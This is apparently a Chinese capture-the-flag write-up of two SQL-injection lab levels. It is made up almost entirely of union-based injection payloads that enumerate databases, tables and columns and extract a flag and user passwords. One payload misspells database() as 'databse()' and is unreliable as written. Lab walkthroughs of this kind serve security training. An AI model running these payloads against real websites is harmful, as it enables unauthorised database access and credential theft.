第一关:
输入?id=1 正常
输入?id=1' 报错 ' .0 '
输入?id=1'--+ 正常
判断他是字符型注入 闭合方式是:
?id=1' and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata--+
联合注入
爆出库:ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test
?id=1' and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='ctfshow'--+
爆出表:flag
?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'--+
爆出列:id flag
?id=1' and 1=2 union select 1,2,group_concat(flag) from ctfshow.flag--+
第二关:
输入?id=1 正常
输入?id=1'报错
输入?id=1'--+ 报错
接下来查看哪些可以回显:
?id=-1 union select 1,2,3--+
查看数据库名称:
?id=-1 union select 1,databse(),3 --+
?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
查看数据库中的表:
?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
查看表中所有字段:
?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--
查看数据:
?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users --+